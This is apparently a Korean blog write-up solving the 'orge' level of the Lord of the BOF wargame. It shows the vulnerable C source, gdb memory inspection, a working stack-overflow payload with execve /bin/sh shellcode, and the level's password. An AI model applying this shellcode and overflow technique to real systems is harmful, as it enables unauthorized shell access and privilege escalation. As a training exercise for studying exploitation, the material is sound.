파일 목록 확인 후, orge.c 파일 내용 확인
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
|
[darkelf@localhost darkelf]$ cat orge.c
/*
The Lord of the BOF : The Fellowship of the BOF
- orge
- check argv[0]
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
main(int argc, char *argv[])
{
char buffer[40];
int i;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// here is changed!
if(strlen(argv[0]) != 77){
printf("argv[0] error\n");
exit(0);
}
// egghunter
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
// check the length of argument
if(strlen(argv[1]) > 48){
printf("argument is too long!\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// buffer hunter
memset(buffer, 0, 40);
}
|
cs |
mkdir로 tmp디렉토리 생성 후 tmp 디렉토리로 이동
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
[darkelf@localhost tmp]$ gdb -c core -q
Core was generated by `./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA D'.
Program terminated with signal 11, Segmentation fault.
#0 0xbfffffff in ?? ()
(gdb) x/1000x $esp
0xbffff9d0: 0x00000000 0xbffffa14 0xbffffa24 0x40013868
0xbffff9e0: 0x00000003 0x08048450 0x00000000 0x08048471
...
---Type <return> to continue, or q <return> to quit---return
0xbffffb40: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffb50: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffb60: 0x41414141 0x41414141 0x41414141 0x44440041
0xbffffb70: 0x44444444 0x44444444 0x44444444 0x44444444
0xbffffb80: 0x44444444 0x44444444 0x44444444 0x44444444
0xbffffb90: 0x44444444 0x44444444 0xffff4444 0x9000bfff
0xbffffba0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbb0: 0x31909090 0x2f6850c0 0x6868732f 0x6e69622f
0xbffffbc0: 0x5350e389 0xc289e189 0x80cd0bb0 0x00000000
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) q
|
cs |
gdb로 쉘코드 들어가기 시작하는 지점 위치 확인
|
1
2
3
4
5
6
7
8
|
[darkelf@localhost tmp]$ cd ..
[darkelf@localhost darkelf]$ ./`python -c 'print "A"*75+" "+"D"*44+"\xb0\xfb\xff\xbf"+" "+"\x90"*20+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD°ûÿ¿
bash$ id
uid=506(darkelf) gid=506(darkelf) euid=507(orge) egid=507(orge) groups=506(darkelf)
bash$ my-pass
euid = 507
timewalker
|
cs |
페이로드 작성 후 쉘 열고 비밀번호 획득
pw : timewalker